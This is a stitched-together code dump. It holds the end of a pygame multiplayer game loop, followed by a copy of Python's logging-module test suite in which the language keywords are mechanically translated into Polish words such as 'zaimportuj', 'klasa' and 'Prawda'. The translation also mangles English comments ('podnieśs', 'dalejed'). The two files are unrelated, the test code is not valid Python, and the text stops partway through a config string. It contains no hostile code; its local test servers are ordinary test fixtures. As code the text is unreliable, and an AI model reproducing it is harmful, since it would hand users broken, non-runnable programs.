pygame.mouse.set_visible(True) if players_connected(players): if not fog_closing: frame_counter += 1 if frame_counter % 30 == 0: for i in range(0, number_of_players): players[i].toggle_show() for i in range(0, number_of_players): check_player = players[i].update() if not check_player: winsound.PlaySound("sounds/kick.wav", winsound.SND_ASYNC) players[i].stop() if players_stopped(players): winsound.PlaySound("sounds/victory.wav", winsound.SND_ASYNC) moving_player = find_moving_player(players) if moving_player is not None: moving_player.points += 100 screen.blit(crown, (moving_player.x - 11, moving_player.y - 35)) draw_menu(players, frame_counter) pygame.display.flip() for i in range(0, 180): for event in pygame.event.get(): if event.type == pygame.QUIT: done = True if event.type == pygame.KEYDOWN: if event.key == pygame.K_F11: pygame.display.set_mode((width + menu_width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: pygame.display.set_mode((width + menu_width, height)) pygame.mouse.set_visible(True) waiting_for_round = True last_time = frame_counter frame_counter = i draw_menu(players, frame_counter) pygame.display.flip() clock.tick(60) done = True if not fog_closing: draw_outline(fog_number) if frame_counter is not 0 and frame_counter % 601 == 0: fog_closing = True frame_counter = 0 else: draw_fog(fog_current_percent, fog_number) fog_current_percent += 0.5 if fog_current_percent > 100: fog_current_percent = 0 fog_closing = False frame_counter = 1 fog_number += 1 most_points = draw_menu(players, frame_counter) if most_points >= 1000: game_ended = True pygame.display.flip() clock.tick(60) for i in range(0, number_of_players): players[i].reset() players[i].change_starting_point(S.random_point(), random_direction()) players[i].update() # ON GAME ENDED winsound.PlaySound("sounds/won.wav", winsound.SND_ASYNC) players.sort(key=get_points, reverse=True) width = width + menu_width while True: for event in pygame.event.get(): if event.type == pygame.QUIT: exit(0) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: exit(0) screen.fill(C.black) indent = int((width - logobig_rect.width) / 2) logobig_rect.x = indent logobig_rect.y = int(indent / 4) screen.blit(logobig, logobig_rect) text = bigfont.render("Winner - Player " + str(players[0].server.port + 1 - port) + ": " + str(int(players[0].points)) + " points", True, players[0].color) temp_y = logobig_rect.y + indent temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) player_num = 1 temp_y += int(indent/10) for r in range(1, number_of_players): _x = players[r] temp_y += int(indent/15) player_num += 1 text_player_ranking = font.render(str(player_num) + ". Player " + str(_x.server.port - (port - 1)) + ": " + str(int(_x.points)) + " points", True, _x.color) temp_x = int((width - text_player_ranking.get_width()) / 2) screen.blit(text_player_ranking, (temp_x, temp_y)) pygame.display.flip() clock.tick(60)
test_logging.py
# Copyright 2001-2014 by Vinay Sajip. All Rights Reserved. # # Permission to use, copy, modify, oraz distribute this software oraz its # documentation dla any purpose oraz without fee jest hereby granted, # provided that the above copyright notice appear w all copies oraz that # both that copyright notice oraz this permission notice appear w # supporting documentation, oraz that the name of Vinay Sajip # nie be used w advertising albo publicity pertaining to distribution # of the software without specific, written prior permission. # VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING # ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL # VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR # ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER # IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT # OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. """Test harness dla the logging module. Run all tests. Copyright (C) 2001-2014 Vinay Sajip. All Rights Reserved. """ zaimportuj logging zaimportuj logging.handlers zaimportuj logging.config zaimportuj codecs zaimportuj configparser zaimportuj datetime zaimportuj pickle zaimportuj io zaimportuj gc zaimportuj json zaimportuj os zaimportuj queue zaimportuj random zaimportuj re zaimportuj socket zaimportuj struct zaimportuj sys zaimportuj tempfile z test.support.script_helper zaimportuj assert_python_ok z test zaimportuj support zaimportuj textwrap zaimportuj time zaimportuj unittest zaimportuj warnings zaimportuj weakref spróbuj: zaimportuj threading # The following imports are needed only dla tests which # require threading zaimportuj asyncore z http.server zaimportuj HTTPServer, BaseHTTPRequestHandler zaimportuj smtpd z urllib.parse zaimportuj urlparse, parse_qs z socketserver zaimportuj (ThreadingUDPServer, DatagramRequestHandler, ThreadingTCPServer, StreamRequestHandler) wyjąwszy ImportError: threading = Nic spróbuj: zaimportuj win32evtlog wyjąwszy ImportError: win32evtlog = Nic spróbuj: zaimportuj win32evtlogutil wyjąwszy ImportError: win32evtlogutil = Nic win32evtlog = Nic spróbuj: zaimportuj zlib wyjąwszy ImportError: dalej klasa BaseTest(unittest.TestCase): """Base klasa dla logging tests.""" log_format = "%(name)s -> %(levelname)s: %(message)s" expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$" message_num = 0 def setUp(self): """Setup the default logging stream to an internal StringIO instance, so that we can examine log output jako we want.""" logger_dict = logging.getLogger().manager.loggerDict logging._acquireLock() spróbuj: self.saved_handlers = logging._handlers.copy() self.saved_handler_list = logging._handlerList[:] self.saved_loggers = saved_loggers = logger_dict.copy() self.saved_name_to_level = logging._nameToLevel.copy() self.saved_level_to_name = logging._levelToName.copy() self.logger_states = logger_states = {} dla name w saved_loggers: logger_states[name] = getattr(saved_loggers[name], 'disabled', Nic) w_końcu: logging._releaseLock() # Set two unused loggers self.logger1 = logging.getLogger("\xab\xd7\xbb") self.logger2 = logging.getLogger("\u013f\u00d6\u0047") self.root_logger = logging.getLogger("") self.original_logging_level = self.root_logger.getEffectiveLevel() self.stream = io.StringIO() self.root_logger.setLevel(logging.DEBUG) self.root_hdlr = logging.StreamHandler(self.stream) self.root_formatter = logging.Formatter(self.log_format) self.root_hdlr.setFormatter(self.root_formatter) jeżeli self.logger1.hasHandlers(): hlist = self.logger1.handlers + self.root_logger.handlers podnieś AssertionError('Unexpected handlers: %s' % hlist) jeżeli self.logger2.hasHandlers(): hlist = self.logger2.handlers + self.root_logger.handlers podnieś AssertionError('Unexpected handlers: %s' % hlist) self.root_logger.addHandler(self.root_hdlr) self.assertPrawda(self.logger1.hasHandlers()) self.assertPrawda(self.logger2.hasHandlers()) def tearDown(self): """Remove our logging stream, oraz restore the original logging level.""" self.stream.close() self.root_logger.removeHandler(self.root_hdlr) dopóki self.root_logger.handlers: h = self.root_logger.handlers[0] self.root_logger.removeHandler(h) h.close() self.root_logger.setLevel(self.original_logging_level) logging._acquireLock() spróbuj: logging._levelToName.clear() logging._levelToName.update(self.saved_level_to_name) logging._nameToLevel.clear() logging._nameToLevel.update(self.saved_name_to_level) logging._handlers.clear() logging._handlers.update(self.saved_handlers) logging._handlerList[:] = self.saved_handler_list loggerDict = logging.getLogger().manager.loggerDict loggerDict.clear() loggerDict.update(self.saved_loggers) logger_states = self.logger_states dla name w self.logger_states: jeżeli logger_states[name] jest nie Nic: self.saved_loggers[name].disabled = logger_states[name] w_końcu: logging._releaseLock() def assert_log_lines(self, expected_values, stream=Nic, pat=Nic): """Match the collected log lines against the regular expression self.expected_log_pat, oraz compare the extracted group values to the expected_values list of tuples.""" stream = stream albo self.stream pat = re.compile(pat albo self.expected_log_pat) actual_lines = stream.getvalue().splitlines() self.assertEqual(len(actual_lines), len(expected_values)) dla actual, expected w zip(actual_lines, expected_values): match = pat.search(actual) jeżeli nie match: self.fail("Log line does nie match expected pattern:\n" + actual) self.assertEqual(tuple(match.groups()), expected) s = stream.read() jeżeli s: self.fail("Remaining output at end of log stream:\n" + s) def next_message(self): """Generate a message consisting solely of an auto-incrementing integer.""" self.message_num += 1 zwróć "%d" % self.message_num klasa BuiltinLevelsTest(BaseTest): """Test builtin levels oraz their inheritance.""" def test_flat(self): #Logging levels w a flat logger namespace. m = self.next_message ERR = logging.getLogger("ERR") ERR.setLevel(logging.ERROR) INF = logging.LoggerAdapter(logging.getLogger("INF"), {}) INF.setLevel(logging.INFO) DEB = logging.getLogger("DEB") DEB.setLevel(logging.DEBUG) # These should log. ERR.log(logging.CRITICAL, m()) ERR.error(m()) INF.log(logging.CRITICAL, m()) INF.error(m()) INF.warning(m()) INF.info(m()) DEB.log(logging.CRITICAL, m()) DEB.error(m()) DEB.warning(m()) DEB.info(m()) DEB.debug(m()) # These should nie log. ERR.warning(m()) ERR.info(m()) ERR.debug(m()) INF.debug(m()) self.assert_log_lines([ ('ERR', 'CRITICAL', '1'), ('ERR', 'ERROR', '2'), ('INF', 'CRITICAL', '3'), ('INF', 'ERROR', '4'), ('INF', 'WARNING', '5'), ('INF', 'INFO', '6'), ('DEB', 'CRITICAL', '7'), ('DEB', 'ERROR', '8'), ('DEB', 'WARNING', '9'), ('DEB', 'INFO', '10'), ('DEB', 'DEBUG', '11'), ]) def test_nested_explicit(self): # Logging levels w a nested namespace, all explicitly set. m = self.next_message INF = logging.getLogger("INF") INF.setLevel(logging.INFO) INF_ERR = logging.getLogger("INF.ERR") INF_ERR.setLevel(logging.ERROR) # These should log. INF_ERR.log(logging.CRITICAL, m()) INF_ERR.error(m()) # These should nie log. INF_ERR.warning(m()) INF_ERR.info(m()) INF_ERR.debug(m()) self.assert_log_lines([ ('INF.ERR', 'CRITICAL', '1'), ('INF.ERR', 'ERROR', '2'), ]) def test_nested_inherited(self): #Logging levels w a nested namespace, inherited z parent loggers. m = self.next_message INF = logging.getLogger("INF") INF.setLevel(logging.INFO) INF_ERR = logging.getLogger("INF.ERR") INF_ERR.setLevel(logging.ERROR) INF_UNDEF = logging.getLogger("INF.UNDEF") INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF") UNDEF = logging.getLogger("UNDEF") # These should log. INF_UNDEF.log(logging.CRITICAL, m()) INF_UNDEF.error(m()) INF_UNDEF.warning(m()) INF_UNDEF.info(m()) INF_ERR_UNDEF.log(logging.CRITICAL, m()) INF_ERR_UNDEF.error(m()) # These should nie log. INF_UNDEF.debug(m()) INF_ERR_UNDEF.warning(m()) INF_ERR_UNDEF.info(m()) INF_ERR_UNDEF.debug(m()) self.assert_log_lines([ ('INF.UNDEF', 'CRITICAL', '1'), ('INF.UNDEF', 'ERROR', '2'), ('INF.UNDEF', 'WARNING', '3'), ('INF.UNDEF', 'INFO', '4'), ('INF.ERR.UNDEF', 'CRITICAL', '5'), ('INF.ERR.UNDEF', 'ERROR', '6'), ]) def test_nested_with_virtual_parent(self): # Logging levels when some parent does nie exist yet. m = self.next_message INF = logging.getLogger("INF") GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF") CHILD = logging.getLogger("INF.BADPARENT") INF.setLevel(logging.INFO) # These should log. GRANDCHILD.log(logging.FATAL, m()) GRANDCHILD.info(m()) CHILD.log(logging.FATAL, m()) CHILD.info(m()) # These should nie log. GRANDCHILD.debug(m()) CHILD.debug(m()) self.assert_log_lines([ ('INF.BADPARENT.UNDEF', 'CRITICAL', '1'), ('INF.BADPARENT.UNDEF', 'INFO', '2'), ('INF.BADPARENT', 'CRITICAL', '3'), ('INF.BADPARENT', 'INFO', '4'), ]) def test_regression_22386(self): """See issue #22386 dla more information.""" self.assertEqual(logging.getLevelName('INFO'), logging.INFO) self.assertEqual(logging.getLevelName(logging.INFO), 'INFO') klasa BasicFilterTest(BaseTest): """Test the bundled Filter class.""" def test_filter(self): # Only messages satisfying the specified criteria dalej through the # filter. filter_ = logging.Filter("spam.eggs") handler = self.root_logger.handlers[0] spróbuj: handler.addFilter(filter_) spam = logging.getLogger("spam") spam_eggs = logging.getLogger("spam.eggs") spam_eggs_fish = logging.getLogger("spam.eggs.fish") spam_bakedbeans = logging.getLogger("spam.bakedbeans") spam.info(self.next_message()) spam_eggs.info(self.next_message()) # Good. spam_eggs_fish.info(self.next_message()) # Good. spam_bakedbeans.info(self.next_message()) self.assert_log_lines([ ('spam.eggs', 'INFO', '2'), ('spam.eggs.fish', 'INFO', '3'), ]) w_końcu: handler.removeFilter(filter_) def test_callable_filter(self): # Only messages satisfying the specified criteria dalej through the # filter. def filterfunc(record): parts = record.name.split('.') prefix = '.'.join(parts[:2]) zwróć prefix == 'spam.eggs' handler = self.root_logger.handlers[0] spróbuj: handler.addFilter(filterfunc) spam = logging.getLogger("spam") spam_eggs = logging.getLogger("spam.eggs") spam_eggs_fish = logging.getLogger("spam.eggs.fish") spam_bakedbeans = logging.getLogger("spam.bakedbeans") spam.info(self.next_message()) spam_eggs.info(self.next_message()) # Good. spam_eggs_fish.info(self.next_message()) # Good. spam_bakedbeans.info(self.next_message()) self.assert_log_lines([ ('spam.eggs', 'INFO', '2'), ('spam.eggs.fish', 'INFO', '3'), ]) w_końcu: handler.removeFilter(filterfunc) def test_empty_filter(self): f = logging.Filter() r = logging.makeLogRecord({'name': 'spam.eggs'}) self.assertPrawda(f.filter(r)) # # First, we define our levels. There can be jako many jako you want - the only # limitations are that they should be integers, the lowest should be > 0 oraz # larger values mean less information being logged. If you need specific # level values which do nie fit into these limitations, you can use a # mapping dictionary to convert between your application levels oraz the # logging system. # SILENT = 120 TACITURN = 119 TERSE = 118 EFFUSIVE = 117 SOCIABLE = 116 VERBOSE = 115 TALKATIVE = 114 GARRULOUS = 113 CHATTERBOX = 112 BORING = 111 LEVEL_RANGE = range(BORING, SILENT + 1) # # Next, we define names dla our levels. You don't need to do this - w which # case the system will use "Level n" to denote the text dla the level. # my_logging_levels = { SILENT : 'Silent', TACITURN : 'Taciturn', TERSE : 'Terse', EFFUSIVE : 'Effusive', SOCIABLE : 'Sociable', VERBOSE : 'Verbose', TALKATIVE : 'Talkative', GARRULOUS : 'Garrulous', CHATTERBOX : 'Chatterbox', BORING : 'Boring', } klasa GarrulousFilter(logging.Filter): """A filter which blocks garrulous messages.""" def filter(self, record): zwróć record.levelno != GARRULOUS klasa VerySpecificFilter(logging.Filter): """A filter which blocks sociable oraz taciturn messages.""" def filter(self, record): zwróć record.levelno nie w [SOCIABLE, TACITURN] klasa CustomLevelsAndFiltersTest(BaseTest): """Test various filtering possibilities przy custom logging levels.""" # Skip the logger name group. expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$" def setUp(self): BaseTest.setUp(self) dla k, v w my_logging_levels.items(): logging.addLevelName(k, v) def log_at_all_levels(self, logger): dla lvl w LEVEL_RANGE: logger.log(lvl, self.next_message()) def test_logger_filter(self): # Filter at logger level. self.root_logger.setLevel(VERBOSE) # Levels >= 'Verbose' are good. self.log_at_all_levels(self.root_logger) self.assert_log_lines([ ('Verbose', '5'), ('Sociable', '6'), ('Effusive', '7'), ('Terse', '8'), ('Taciturn', '9'), ('Silent', '10'), ]) def test_handler_filter(self): # Filter at handler level. self.root_logger.handlers[0].setLevel(SOCIABLE) spróbuj: # Levels >= 'Sociable' are good. self.log_at_all_levels(self.root_logger) self.assert_log_lines([ ('Sociable', '6'), ('Effusive', '7'), ('Terse', '8'), ('Taciturn', '9'), ('Silent', '10'), ]) w_końcu: self.root_logger.handlers[0].setLevel(logging.NOTSET) def test_specific_filters(self): # Set a specific filter object on the handler, oraz then add another # filter object on the logger itself. handler = self.root_logger.handlers[0] specific_filter = Nic garr = GarrulousFilter() handler.addFilter(garr) spróbuj: self.log_at_all_levels(self.root_logger) first_lines = [ # Notice how 'Garrulous' jest missing ('Boring', '1'), ('Chatterbox', '2'), ('Talkative', '4'), ('Verbose', '5'), ('Sociable', '6'), ('Effusive', '7'), ('Terse', '8'), ('Taciturn', '9'), ('Silent', '10'), ] self.assert_log_lines(first_lines) specific_filter = VerySpecificFilter() self.root_logger.addFilter(specific_filter) self.log_at_all_levels(self.root_logger) self.assert_log_lines(first_lines + [ # Not only 'Garrulous' jest still missing, but also 'Sociable' # oraz 'Taciturn' ('Boring', '11'), ('Chatterbox', '12'), ('Talkative', '14'), ('Verbose', '15'), ('Effusive', '17'), ('Terse', '18'), ('Silent', '20'), ]) w_końcu: jeżeli specific_filter: self.root_logger.removeFilter(specific_filter) handler.removeFilter(garr) klasa HandlerTest(BaseTest): def test_name(self): h = logging.Handler() h.name = 'generic' self.assertEqual(h.name, 'generic') h.name = 'anothergeneric' self.assertEqual(h.name, 'anothergeneric') self.assertRaises(NotImplementedError, h.emit, Nic) def test_builtin_handlers(self): # We can't actually *use* too many handlers w the tests, # but we can try instantiating them przy various options jeżeli sys.platform w ('linux', 'darwin'): dla existing w (Prawda, Nieprawda): fd, fn = tempfile.mkstemp() os.close(fd) jeżeli nie existing: os.unlink(fn) h = logging.handlers.WatchedFileHandler(fn, delay=Prawda) jeżeli existing: dev, ino = h.dev, h.ino self.assertEqual(dev, -1) self.assertEqual(ino, -1) r = logging.makeLogRecord({'msg': 'Test'}) h.handle(r) # Now remove the file. os.unlink(fn) self.assertNieprawda(os.path.exists(fn)) # The next call should recreate the file. h.handle(r) self.assertPrawda(os.path.exists(fn)) inaczej: self.assertEqual(h.dev, -1) self.assertEqual(h.ino, -1) h.close() jeżeli existing: os.unlink(fn) jeżeli sys.platform == 'darwin': sockname = '/var/run/syslog' inaczej: sockname = '/dev/log' spróbuj: h = logging.handlers.SysLogHandler(sockname) self.assertEqual(h.facility, h.LOG_USER) self.assertPrawda(h.unixsocket) h.close() wyjąwszy OSError: # syslogd might nie be available dalej dla method w ('GET', 'POST', 'PUT'): jeżeli method == 'PUT': self.assertRaises(ValueError, logging.handlers.HTTPHandler, 'localhost', '/log', method) inaczej: h = logging.handlers.HTTPHandler('localhost', '/log', method) h.close() h = logging.handlers.BufferingHandler(0) r = logging.makeLogRecord({}) self.assertPrawda(h.shouldFlush(r)) h.close() h = logging.handlers.BufferingHandler(1) self.assertNieprawda(h.shouldFlush(r)) h.close() @unittest.skipIf(os.name == 'nt', 'WatchedFileHandler nie appropriate dla Windows.') @unittest.skipUnless(threading, 'Threading required dla this test.') def test_race(self): # Issue #14632 refers. def remove_loop(fname, tries): dla _ w range(tries): spróbuj: os.unlink(fname) self.deletion_time = time.time() wyjąwszy OSError: dalej time.sleep(0.004 * random.randint(0, 4)) del_count = 500 log_count = 500 self.handle_time = Nic self.deletion_time = Nic dla delay w (Nieprawda, Prawda): fd, fn = tempfile.mkstemp('.log', 'test_logging-3-') os.close(fd) remover = threading.Thread(target=remove_loop, args=(fn, del_count)) remover.daemon = Prawda remover.start() h = logging.handlers.WatchedFileHandler(fn, delay=delay) f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s') h.setFormatter(f) spróbuj: dla _ w range(log_count): time.sleep(0.005) r = logging.makeLogRecord({'msg': 'testing' }) spróbuj: self.handle_time = time.time() h.handle(r) wyjąwszy Exception: print('Deleted at %s, ' 'opened at %s' % (self.deletion_time, self.handle_time)) podnieś w_końcu: remover.join() h.close() jeżeli os.path.exists(fn): os.unlink(fn) klasa BadStream(object): def write(self, data): podnieś RuntimeError('deliberate mistake') klasa TestStreamHandler(logging.StreamHandler): def handleError(self, record): self.error_record = record klasa StreamHandlerTest(BaseTest): def test_error_handling(self): h = TestStreamHandler(BadStream()) r = logging.makeLogRecord({}) old_raise = logging.raiseExceptions spróbuj: h.handle(r) self.assertIs(h.error_record, r) h = logging.StreamHandler(BadStream()) przy support.captured_stderr() jako stderr: h.handle(r) msg = '\nRuntimeError: deliberate mistake\n' self.assertIn(msg, stderr.getvalue()) logging.raiseExceptions = Nieprawda przy support.captured_stderr() jako stderr: h.handle(r) self.assertEqual('', stderr.getvalue()) w_końcu: logging.raiseExceptions = old_raise # -- The following section could be moved into a server_helper.py module # -- jeżeli it proves to be of wider utility than just test_logging jeżeli threading: klasa TestSMTPServer(smtpd.SMTPServer): """ This klasa implements a test SMTP server. :param addr: A (host, port) tuple which the server listens on. You can specify a port value of zero: the server's *port* attribute will hold the actual port number used, which can be used w client connections. :param handler: A callable which will be called to process incoming messages. The handler will be dalejed the client address tuple, who the message jest from, a list of recipients oraz the message data. :param poll_interval: The interval, w seconds, used w the underlying :func:`select` albo :func:`poll` call by :func:`asyncore.loop`. :param sockmap: A dictionary which will be used to hold :class:`asyncore.dispatcher` instances used by :func:`asyncore.loop`. This avoids changing the :mod:`asyncore` module's global state. """ def __init__(self, addr, handler, poll_interval, sockmap): smtpd.SMTPServer.__init__(self, addr, Nic, map=sockmap, decode_data=Prawda) self.port = self.socket.getsockname()[1] self._handler = handler self._thread = Nic self.poll_interval = poll_interval def process_message(self, peer, mailfrom, rcpttos, data): """ Delegates to the handler dalejed w to the server's constructor. Typically, this will be a test case method. :param peer: The client (host, port) tuple. :param mailfrom: The address of the sender. :param rcpttos: The addresses of the recipients. :param data: The message. """ self._handler(peer, mailfrom, rcpttos, data) def start(self): """ Start the server running on a separate daemon thread. """ self._thread = t = threading.Thread(target=self.serve_forever, args=(self.poll_interval,)) t.setDaemon(Prawda) t.start() def serve_forever(self, poll_interval): """ Run the :mod:`asyncore` loop until normal termination conditions arise. :param poll_interval: The interval, w seconds, used w the underlying :func:`select` albo :func:`poll` call by :func:`asyncore.loop`. """ spróbuj: asyncore.loop(poll_interval, map=self._map) wyjąwszy OSError: # On FreeBSD 8, closing the server repeatably # podnieśs this error. We swallow it jeżeli the # server has been closed. jeżeli self.connected albo self.accepting: podnieś def stop(self, timeout=Nic): """ Stop the thread by closing the server instance. Wait dla the server thread to terminate. :param timeout: How long to wait dla the server thread to terminate. """ self.close() self._thread.join(timeout) self._thread = Nic klasa ControlMixin(object): """ This mixin jest used to start a server on a separate thread, oraz shut it down programmatically. Request handling jest simplified - instead of needing to derive a suitable RequestHandler subclass, you just provide a callable which will be dalejed each received request to be processed. :param handler: A handler callable which will be called przy a single parameter - the request - w order to process the request. This handler jest called on the server thread, effectively meaning that requests are processed serially. While nie quite Web scale ;-), this should be fine dla testing applications. :param poll_interval: The polling interval w seconds. """ def __init__(self, handler, poll_interval): self._thread = Nic self.poll_interval = poll_interval self._handler = handler self.ready = threading.Event() def start(self): """ Create a daemon thread to run the server, oraz start it. """ self._thread = t = threading.Thread(target=self.serve_forever, args=(self.poll_interval,)) t.setDaemon(Prawda) t.start() def serve_forever(self, poll_interval): """ Run the server. Set the ready flag before entering the service loop. """ self.ready.set() super(ControlMixin, self).serve_forever(poll_interval) def stop(self, timeout=Nic): """ Tell the server thread to stop, oraz wait dla it to do so. :param timeout: How long to wait dla the server thread to terminate. """ self.shutdown() jeżeli self._thread jest nie Nic: self._thread.join(timeout) self._thread = Nic self.server_close() self.ready.clear() klasa TestHTTPServer(ControlMixin, HTTPServer): """ An HTTP server which jest controllable using :class:`ControlMixin`. :param addr: A tuple przy the IP address oraz port to listen on. :param handler: A handler callable which will be called przy a single parameter - the request - w order to process the request. :param poll_interval: The polling interval w seconds. :param log: Pass ``Prawda`` to enable log messages. """ def __init__(self, addr, handler, poll_interval=0.5, log=Nieprawda, sslctx=Nic): klasa DelegatingHTTPRequestHandler(BaseHTTPRequestHandler): def __getattr__(self, name, default=Nic): jeżeli name.startswith('do_'): zwróć self.process_request podnieś AttributeError(name) def process_request(self): self.server._handler(self) def log_message(self, format, *args): jeżeli log: super(DelegatingHTTPRequestHandler, self).log_message(format, *args) HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler) ControlMixin.__init__(self, handler, poll_interval) self.sslctx = sslctx def get_request(self): spróbuj: sock, addr = self.socket.accept() jeżeli self.sslctx: sock = self.sslctx.wrap_socket(sock, server_side=Prawda) wyjąwszy OSError jako e: # socket errors are silenced by the caller, print them here sys.stderr.write("Got an error:\n%s\n" % e) podnieś zwróć sock, addr klasa TestTCPServer(ControlMixin, ThreadingTCPServer): """ A TCP server which jest controllable using :class:`ControlMixin`. :param addr: A tuple przy the IP address oraz port to listen on. :param handler: A handler callable which will be called przy a single parameter - the request - w order to process the request. :param poll_interval: The polling interval w seconds. :bind_and_activate: If Prawda (the default), binds the server oraz starts it listening. If Nieprawda, you need to call :meth:`server_bind` oraz :meth:`server_activate` at some later time before calling :meth:`start`, so that the server will set up the socket oraz listen on it. """ allow_reuse_address = Prawda def __init__(self, addr, handler, poll_interval=0.5, bind_and_activate=Prawda): klasa DelegatingTCPRequestHandler(StreamRequestHandler): def handle(self): self.server._handler(self) ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler, bind_and_activate) ControlMixin.__init__(self, handler, poll_interval) def server_bind(self): super(TestTCPServer, self).server_bind() self.port = self.socket.getsockname()[1] klasa TestUDPServer(ControlMixin, ThreadingUDPServer): """ A UDP server which jest controllable using :class:`ControlMixin`. :param addr: A tuple przy the IP address oraz port to listen on. :param handler: A handler callable which will be called przy a single parameter - the request - w order to process the request. :param poll_interval: The polling interval dla shutdown requests, w seconds. :bind_and_activate: If Prawda (the default), binds the server oraz starts it listening. If Nieprawda, you need to call :meth:`server_bind` oraz :meth:`server_activate` at some later time before calling :meth:`start`, so that the server will set up the socket oraz listen on it. """ def __init__(self, addr, handler, poll_interval=0.5, bind_and_activate=Prawda): klasa DelegatingUDPRequestHandler(DatagramRequestHandler): def handle(self): self.server._handler(self) def finish(self): data = self.wfile.getvalue() jeżeli data: spróbuj: super(DelegatingUDPRequestHandler, self).finish() wyjąwszy OSError: jeżeli nie self.server._closed: podnieś ThreadingUDPServer.__init__(self, addr, DelegatingUDPRequestHandler, bind_and_activate) ControlMixin.__init__(self, handler, poll_interval) self._closed = Nieprawda def server_bind(self): super(TestUDPServer, self).server_bind() self.port = self.socket.getsockname()[1] def server_close(self): super(TestUDPServer, self).server_close() self._closed = Prawda jeżeli hasattr(socket, "AF_UNIX"): klasa TestUnixStreamServer(TestTCPServer): address_family = socket.AF_UNIX klasa TestUnixDatagramServer(TestUDPServer): address_family = socket.AF_UNIX # - end of server_helper section @unittest.skipUnless(threading, 'Threading required dla this test.') klasa SMTPHandlerTest(BaseTest): TIMEOUT = 8.0 def test_basic(self): sockmap = {} server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001, sockmap) server.start() addr = (support.HOST, server.port) h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log', timeout=self.TIMEOUT) self.assertEqual(h.toaddrs, ['you']) self.messages = [] r = logging.makeLogRecord({'msg': 'Hello'}) self.handled = threading.Event() h.handle(r) self.handled.wait(self.TIMEOUT) # 14314: don't wait forever server.stop() self.assertPrawda(self.handled.is_set()) self.assertEqual(len(self.messages), 1) peer, mailfrom, rcpttos, data = self.messages[0] self.assertEqual(mailfrom, 'me') self.assertEqual(rcpttos, ['you']) self.assertIn('\nSubject: Log\n', data) self.assertPrawda(data.endswith('\n\nHello')) h.close() def process_message(self, *args): self.messages.append(args) self.handled.set() klasa MemoryHandlerTest(BaseTest): """Tests dla the MemoryHandler.""" # Do nie bother przy a logger name group. expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$" def setUp(self): BaseTest.setUp(self) self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING, self.root_hdlr) self.mem_logger = logging.getLogger('mem') self.mem_logger.propagate = 0 self.mem_logger.addHandler(self.mem_hdlr) def tearDown(self): self.mem_hdlr.close() BaseTest.tearDown(self) def test_flush(self): # The memory handler flushes to its target handler based on specific # criteria (message count oraz message level). self.mem_logger.debug(self.next_message()) self.assert_log_lines([]) self.mem_logger.info(self.next_message()) self.assert_log_lines([]) # This will flush because the level jest >= logging.WARNING self.mem_logger.warning(self.next_message()) lines = [ ('DEBUG', '1'), ('INFO', '2'), ('WARNING', '3'), ] self.assert_log_lines(lines) dla n w (4, 14): dla i w range(9): self.mem_logger.debug(self.next_message()) self.assert_log_lines(lines) # This will flush because it's the 10th message since the last # flush. self.mem_logger.debug(self.next_message()) lines = lines + [('DEBUG', str(i)) dla i w range(n, n + 10)] self.assert_log_lines(lines) self.mem_logger.debug(self.next_message()) self.assert_log_lines(lines) klasa ExceptionFormatter(logging.Formatter): """A special exception formatter.""" def formatException(self, ei): zwróć "Got a [%s]" % ei[0].__name__ klasa ConfigFileTest(BaseTest): """Reading logging config z a .ini-style config file.""" expected_log_pat = r"^(\w+) \+\+ (\w+)$" # config0 jest a standard configuration. config0 = """ [loggers] keys=root [handlers] keys=hand1 [formatters] keys=form1 [logger_root] level=WARNING handlers=hand1 [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [formatter_form1] format=%(levelname)s ++ %(message)s datefmt= """ # config1 adds a little to the standard configuration. config1 = """ [loggers] keys=root,parser [handlers] keys=hand1 [formatters] keys=form1 [logger_root] level=WARNING handlers= [logger_parser] level=DEBUG handlers=hand1 propagate=1 qualname=compiler.parser [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [formatter_form1] format=%(levelname)s ++ %(message)s datefmt= """ # config1a moves the handler to the root. config1a = """ [loggers] keys=root,parser [handlers] keys=hand1 [formatters] keys=form1 [logger_root] level=WARNING handlers=hand1 [logger_parser] level=DEBUG handlers= propagate=1 qualname=compiler.parser [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [formatter_form1] format=%(levelname)s ++ %(message)s datefmt= """ # config2 has a subtle configuration error that should be reported config2 = config1.replace("sys.stdout", "sys.stbout") # config3 has a less subtle configuration error config3 = config1.replace("formatter=form1", "formatter=misspelled_name") # config4 specifies a custom formatter klasa to be loaded config4 = """ [loggers] keys=root [handlers] keys=hand1 [formatters] keys=form1 [logger_root] level=NOTSET handlers=hand1 [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [formatter_form1] class=""" + __name__ + """.ExceptionFormatter format=%(levelname)s:%(name)s:%(message)s datefmt= """ # config5 specifies a custom handler klasa to be loaded config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler') # config6 uses ', ' delimiters w the handlers oraz formatters sections config6 = """ [loggers] keys=root,parser [handlers] keys=hand1, hand2 [formatters] keys=form1, form2 [logger_root] level=WARNING handlers= [logger_parser] level=DEBUG handlers=hand1 propagate=1 